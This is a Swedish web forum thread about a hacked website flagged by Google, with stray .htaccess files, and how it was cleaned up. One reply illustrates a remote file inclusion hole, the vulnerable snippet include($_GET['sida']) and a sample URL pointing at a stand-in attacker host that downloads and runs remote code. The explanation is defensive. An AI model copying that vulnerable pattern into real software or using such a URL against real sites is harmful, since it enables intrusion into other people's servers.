Meddelande

Minska
No announcement yet.

Jag, Binero och Google, inte överäns

Minska
X
  • Filter
  • Klockan
  • Show
Clear All
new posts

Hittade 5-6 htaccess-filer till.

Kommentera

Att spåra varifrån intrånget kommer är inte alltid helt lätt. Om du har någon kod som skriver till filer kan det finnas en möjlighet att du inte tvättar rent indatan så någon har lyckats ange .htaccess som filnamn. En annan möjlig attackväg är om du inkluderar filer direkt från en get-parameter utan att kolla om värdet är giltigt. Typ index.php?sida=omoss som sedan hamnar i kodsnutten include($_GET['sida']); Om man istället anropar index.php?sida=http://www.attacksida.com/kod.txt så laddas koden i kod.txt ner och körs.

Det finns många saker som kan gå åt pipan. Att säga exakt vad som har skett i ditt fall är omöjligt utan att analysera koden. Om du har tagit bort allt utan att ta en kopia av filerna kan du för övrigt ha tagit bort eventuella värdefulla ledtrådar.
      Gameboy Genius - Foto: Gatukonst och elektronikporr
      Internklippning:
      1) Snaggning av fångar.
      2) Klippning frisörer emellan.

Kommentera

Hej igen...

Nu verkar allt vara bra. En sökning på Google visar inte längre att sidan sprider farligt innehåll.

Nu återstår bara att försöka luska fram var felet ligger.
        Skall kika lite i filerna jag har hemma och se om jag kan komma på vad som kan vara fel.

Tack alla för hjälpen.

Kommentera

Härligt att det löste sig. Hade exakt samma problem och Binero hävdade att min FTP blivit hackad.
          Jobbar med sökoptimering och besvarar gärna medlemmars frågor om SEO.

Kommentera

Working...
          X